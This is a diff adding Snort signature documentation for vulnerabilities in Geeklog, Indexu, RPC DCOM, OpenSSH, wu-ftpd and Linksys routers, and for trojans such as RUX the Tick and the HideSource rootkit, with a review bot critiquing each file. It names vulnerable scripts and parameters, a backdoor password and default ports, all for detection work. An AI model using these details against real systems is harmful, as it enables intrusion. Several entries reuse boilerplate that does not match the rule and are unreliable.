+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
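Review bot: Corrective Action says "Upgrade to the latest non-affected version" but the file names only the affected version ("RSA Security RSA Authentication Agent For Web 5.2") and Additional References is empty; suggest stating the fixed version and adding the vendor advisory. Impact and Detailed Information both say "code of the attackers choosing" without saying where it runs; for a cross site scripting issue, saying that the script executes in the browser of a user visiting the crafted link would make the Impact concrete.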
--- /dev/null
+++ b/doc/signatures/100000740.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000740
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "Import.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "Import.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
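Review bot: The "--" separators after Sid, Affected Systems and Contributors lack the preceding blank line and the file opens with two blank lines before "Rule:"; suggest normalising to the layout of the other files. Fix "ona" in Detailed Information, and the credential-validation paragraph does not describe a remote file include via the "$_CONF[path]" parameter of "Import.Admin.class.php" and should be dropped. Additional References is empty.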
--- /dev/null
+++ b/doc/signatures/100000596.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000596
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_config_payment.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"inv_config_payment.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
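Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials...") is the generic credential-validation boilerplate and does not describe a remote file include through "admin_template_path"; drop it, or replace it with a sentence on what the rule actually keys on (the "inv_config_payment.php" path with a URL scheme in the parameter value). Attack Scenarios has the same problem: it talks about supplying credentials to an authentication mechanism, whereas the scenario here is a request whose parameter points at an attacker-hosted file. Smaller points: "has been attempted" after "exploitation attempt" is redundant, "ona" should be "on a", Affected Systems should list the Indexu versions rather than "All systems running CGI applications using Indexu", Additional References is empty although "Exploits exist" is claimed, and Corrective Action could add the standard PHP-side mitigation of disabling remote file inclusion (allow_url_include and allow_url_fopen off).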
--- /dev/null
+++ b/doc/signatures/220.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+220
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "wank". This is a known password for 
+the HideSource rootkit.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
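Review bot: Detailed Information is incomplete: "This Trojan affects UNIX operating systems:" ends in a colon with nothing following, and the Affected Systems section that every other document carries is missing here, so either finish the sentence and add an Affected Systems block or drop the colon. False Positives "None Known" is hard to defend for a rule that keys on the literal string "wank" inside a Telnet session (per the Summary); any user typing that word, or a legitimate password containing it, fires the rule, so say so and recommend checking the source host before acting. Corrective Action should also tell the reader to check the host for the rootkit itself (Attack Scenarios says the event indicates an existing compromise), not only to delete "the Trojan" and kill processes.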
--- /dev/null
+++ b/doc/signatures/2069.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2069
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in devices using the IPC@CHIP from Beck IPC GmbH.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+The IPC@CHIP from Beck IPC GmbH is used in network appliances for use in
+controlling those devices via a web interface.
+
+The embedded webserver uses the system root as its default webserver 
+root directory. This means an attacker can request any file on the 
+system by making an http request for the file.
+
+--
+Affected Systems:
+All devices using this chip.
+
+--
+Attack Scenarios:
+The attacker needs to craft a special URI including chip.ini with a 
+request for a file on the system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Network devices using this chip should be closely monitored, access to 
+the embedded webserver should be carefully controlled using a firewall 
+or disabled where possible.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2775
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0749
+
+--
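Review bot: Attack Scenarios ("The attacker needs to craft a special URI including chip.ini with a request for a file on the system") is ambiguous: Detailed Information says the web root is the filesystem root, so the scenario is simply an HTTP GET for chip.ini, or any other file, by its path, and chip.ini should be named as the device configuration file that is the target rather than as something "included" in the URI. Corrective Action should add checking for a vendor firmware update, since Additional References point at a known vulnerability (BID 2775, CAN-2001-0749), alongside the firewalling advice already given.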
--- /dev/null
+++ b/doc/signatures/3011.txt
@@ -0,0 +1,73 @@
+Rule: 
+
+--
+Sid: 
+3011
+-- 
+Summary: 
+This event is generated when an attempt is made to find the System
+directory on a target host with the RUX the Tick Trojan.
+
+-- 
+Impact: 
+If successful, the attacker would gain unauthorized access to the system,
+to upload and execute file on the target system. The attacker can use
+this function to upload additional backdoors to the victim's system and
+execute them.
+
+--
+Detailed Information:
+When executed, RUX the Tick opens up its assigned port (default is
+22222) for communication with the attacker. RUX the Tick has three
+functions: Get Windows Directory, Get System Directory, and Upload And
+Execute File. Get Windows Directory and Get System Directory are used
+for reconnaissance. Upload And Execute File is mainly used to upload and
+run other backdoors onto the victim's computer.
+
+--
+Affected Systems:
+	Windows 95/98/ME/NT/2000
+
+--
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files
+because they often can be backdoors in disguise. Once the victim
+mistakenly installs the server program, the attacker usually will employ
+an IP scanner program to find the IP addresses of victims that have
+installed the program. Then the attacker enters the IP address, port
+number (which  is assigned to the server program by the attacker:
+default is 22222), and presses the connect button and he has access to
+the computer.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+Corrective Action: 
+Using Windows Task Manager, kill these processes: ruxserver.exe and server.exe.
+Use Windows Explorer to find ruxserver.exe and delete the file.
+
+Keep anti-virus programs updated with the latest definitions.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com>
+
+-- 
+Additional References:
+
+PestPatrol:
+http://www.pestpatrol.com/PestInfo/R/RUX.ASP
+
+--
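Review bot: the sentence "Be wary of suspicious files because they often can be backdoors in disguise" in Attack Scenarios is advice to the reader and belongs under Corrective Action; the scenario itself should just say the server is delivered as a disguised file, the attacker scans for hosts listening on the configured port (default 22222) and connects. In Corrective Action, "kill these processes: ruxserver.exe and server.exe" needs a caveat: server.exe is a generic name used by legitimate software, so verify the file's path and hash before killing and deleting it, and say to check how the server is started at boot, since killing the process alone may not be enough. Also, the Summary says the rule fires on "Get System Directory" while Detailed Information lists three functions; state explicitly that only that command is matched here.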
--- /dev/null
+++ b/doc/signatures/1716.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1716
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
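Review bot: the document never says what the rule matches: Summary and Detailed Information speak of "a known vulnerability in a CGI web application" and "All systems running CGI applications" without naming the script, the parameter or the vendor, and Additional References is empty even though "Exploits exist" is asserted. Fill in the application and script the rule's content match targets, narrow Affected Systems to that product and version, and add the advisory or CVE that "known vulnerability" refers to; as written the text is a template reused across several sids and gives an analyst nothing to act on. Minor: "running ona web server" should read "running on a web server".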
--- /dev/null
+++ b/doc/signatures/1400.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1400
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
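Review bot: "a potential weakness" in the Summary and "potential weaknesses" in Detailed Information never say what the rule looks for; the fourth paragraph of Detailed Information (sensitive files such as database connection details and passwords reachable over the web interface) implies a request for a specific IIS-related file, so name that file or URI pattern and the analyst can check whether it actually exists on the host. "Sid: 1400" is on one line here while every other document puts the number on its own line under "Sid:", which matters if these files are parsed. Impact "Information gathering possible administrator access." needs punctuation between the two outcomes, and Additional References is empty.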
--- /dev/null
+++ b/doc/signatures/1967.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1967
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
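Review bot: this file is the 1716.txt template with "CGI" replaced by "PHP" and carries the same gap: neither the application nor the script or parameter the rule matches is named, Affected Systems is "All systems running PHP applications", and Additional References is empty despite "Exploits exist". The Attack Scenarios paragraph about supplying credentials to an authentication mechanism also does not fit a rule that, per the Summary, fires on an exploit attempt against a PHP script; replace it with the actual request pattern. Same "ona web server" typo as in 1716.txt.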
--- /dev/null
+++ b/doc/signatures/2398.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2398
+
+--
+Summary:
+This event is generated when an attempt is made to exploit the PHP web
+application WAnewsletter.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the WAnewsletter PHP web application running on a server.
+Multiple vulnerabilities exist in the application which can lead to the
+execution of arbitrary code of the atttackers choosing.
+
+--
+Affected Systems:
+	WAnewsletter
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including a file in
+parameters supplied to the script newsletter.php or db_type.php.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
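Review bot: Attack Scenarios names newsletter.php and db_type.php but not the parameter through which "a file" is included, which is what the rule must be matching; add it, and state the WAnewsletter version(s) in Affected Systems, which currently only repeats the product name. Detailed Information claims "Multiple vulnerabilities exist" and Ease of Attack says no exploit software is required, yet Additional References is empty; cite the advisory. Typo: "atttackers".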
--- /dev/null
+++ b/doc/signatures/100000177.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000177
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a Linksys WRT54G wireless router.
+
+-- 
+Impact: 
+Unauthorized administrative access to the router and it's configuration.
+
+--
+Detailed Information:
+A vulnerability exists in the Linksys WRT54G wireless router that may present 
+an attacker with the opportunity to take control of the victim hardware via a 
+POST request to the web interface.
+
+This is due to the apply.cgi script not performing proper checks on user 
+supplied input that may allow the attacker to overflow a fixed length buffer 
+and execute code of their choosing.
+
+--
+Affected Systems:
+Linksys WRT54G Wireless Router firmware 4.0.4.20.6 and prior
+
+--
+Attack Scenarios: 
+An attacker can supply a malformed POST request to the apply.cgi script on an 
+affected piece of hardware.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied firmware upgrade.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
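Review bot: Impact undersells what Detailed Information describes: overflowing a fixed-length buffer in apply.cgi to "execute code of their choosing" is arbitrary code execution on the router, not merely "Unauthorized administrative access to the router and it's configuration" (also "its", not "it's"). The two Corrective Action lines say the same thing (upgrade the software / apply the firmware upgrade); merge them and add the interim mitigation of not exposing the web interface on the WAN side, since the attack is a single POST to apply.cgi. The affected firmware is pinned precisely (4.0.4.20.6 and prior), so the advisory or CVE that pins it belongs in Additional References, which is empty.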
--- /dev/null
+++ b/doc/signatures/3159.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3159
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
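Review bot: Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share") contradicts Detailed Information, which says the trigger is "a malformed request to an RPC port"; the filename-over-SMB sentence reads as pasted from a different signature and should be replaced with the DCOM RPC request the rule actually matches. Additional References is empty for a vulnerability that has a Microsoft bulletin and a CVE; add them. "Expoit" should be "Exploit".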
--- /dev/null
+++ b/doc/signatures/3369.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3369
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
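Review bot: apart from the Sid, this file is identical to 3159.txt, so nothing tells the reader what distinguishes sid 3369 from 3159 (a different RPC interface or operation, a different transport, a second variant of the overflow); document that difference, otherwise one of the two should simply point at the other. It also inherits the 3159.txt problems: the Attack Scenarios sentence about an overly long filename over a network share does not match the RPC description, the references are empty, and "Expoit" is misspelt.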
--- /dev/null
+++ b/doc/signatures/1811.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1811
+
+--
+Summary:
+This event is generated when a remote user has exploited a flaw in a 
+local SSH server.
+
+--
+Impact:
+Serious
+
+--
+Detailed Information:
+OpenSSH has a flaw in the challenge-response mechanism when configured 
+with either the "PAMAuthenticationViaKbdInt" or the 
+"ChallengeResponseAuthentication" options. This flaw can be exploited by
+a user who is not authenicated and can lead to the attacker obtaining a 
+root shell.
+
+--
+Affected Systems:
+OpenSSH versions 1.2 to 3.3, Solaris 9.0, IBM Linux 
+Affinity Toolkit, and HP HP-UX Secure Shell A.03.10.
+
+--
+Attack Scenarios:
+An attacker can cause the service to restart or hang, leaving the 
+service unavailable to users.
+
+--
+Ease of Attack:
+Simple. Exploit code available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to latest version of OpenSSH
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5093
+
+--
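Review bot: Attack Scenarios ("An attacker can cause the service to restart or hang") describes only the failure mode, while Detailed Information says an unauthenticated attacker obtains a root shell; the scenario should say the attacker sends crafted challenge-response authentication messages to the server, with a crash of sshd as the outcome when exploitation fails, and Impact should say remote root code execution rather than just "Serious". Two wording fixes: the Summary's "has exploited" claims a success the rule cannot see (it sees the attempt), and "authenicated" should be "authenticated". Corrective Action could add the workaround the text already implies: turn off ChallengeResponseAuthentication (and PAMAuthenticationViaKbdInt) until the upgrade is done.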
--- /dev/null
+++ b/doc/signatures/100000388.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000388
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "topman.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "topman.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
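Review bot: the third paragraph of Detailed Information and the whole Attack Scenarios section describe weak credential validation ("supply his/her own credentials to gain access"), which is not what a remote file include via "babInstallPath" in topman.php is; keep the first two paragraphs and state the request shape the rule matches (topman.php with babInstallPath set to a remote URL). Affected Systems should give the Ovidentia versions, not "All systems running CGI applications using Ovidentia", and Additional References is empty. The file also opens with two blank lines before "Rule:", unlike the other documents.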
--- /dev/null
+++ b/doc/signatures/798.txt
@@ -0,0 +1,62 @@
+
+Rule:  
+
+--
+Sid:
+798
+
+--
+Summary:
+This rule has been placed in deleted.rules. It has been superceded by
+sid 721.
+
+--
+Impact:
+Mail worms may spread rapidly because users execute them.
+
+--
+Detailed Information:
+Windows systems are often configured not to display file extensions.
+By adding a second extension, users get confused and think that an
+executable is a picture - e.g. nicegirl.gif.vbs gets displayed as
+nicegirl.gif but is a visual basic script and not a picture.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Famous worms (ILOVEYOU, KOURNIKOVA) are based on this method.
+
+--
+Ease of Attack:
+Very easy. One needs to attach a file and hope that it gets executed.
+
+--
+False Positives:
+None Known
+Could be an error on sender's side.
+
+--
+False Negatives:
+None Known
+-
+
+--
+Corrective Action:
+Use antivirus software. Configure mail clients securely, especially when
+using windows desktops. Educate your mail users. Deny all attachments at
+the gateway if you can.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by tobias.haecker@to.com
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+See websites of antivirus companies.
+
+--
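Review bot: the Summary says this rule lives in deleted.rules and was superseded by sid 721, yet the remaining sections still read as documentation for an active detection; say what 798 matched (an attachment with a double extension such as nicegirl.gif.vbs, per Detailed Information) and point readers to 721 for current coverage. False Positives contradicts itself ("None Known" followed by "Could be an error on sender's side"); a double extension is also normal for legitimate files (archive.tar.gz, for example), so list that as the false positive and drop "None Known". Affected Systems is empty, there is a stray "-" line after False Negatives, and "superceded" should be "superseded".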
--- /dev/null
+++ b/doc/signatures/350.txt
@@ -0,0 +1,63 @@
+SID:
+350
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible execution of commands on the affected server as with elevated user privileges
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) has a problem with very 
+log directory names. There is insufficent checking on directories 
+created by users allowing possible insertion of data into the stack.This
+can lead to execution of code with root / elevated user privileges.
+--
+
+Affected Systems:
+NcFTP Software NcFTPD 2.3.5
+Washington University wu-ftpd 2.4.2 (beta 18) VR10 
+RedHat wu-ftpd 2.4.2 b18-2 
+Washington University wu-ftpd 2.4.2 academ[BETA-18] 
+Probably others as well, susspect anything under Washington University wu-ftpd 2.6.0 for this particular exploit.
+--
+
+Attack Scenarios:
+A local attacker will attempt to create long named directories on the 
+ftp server wich are not checked correctly in the server code. This can 
+allow commands to be executed with elevated user privileges
+--
+
+Ease of Attack:
+simple, Exploit code exists
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to newest version of wuftpd, or replace with something more secure.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
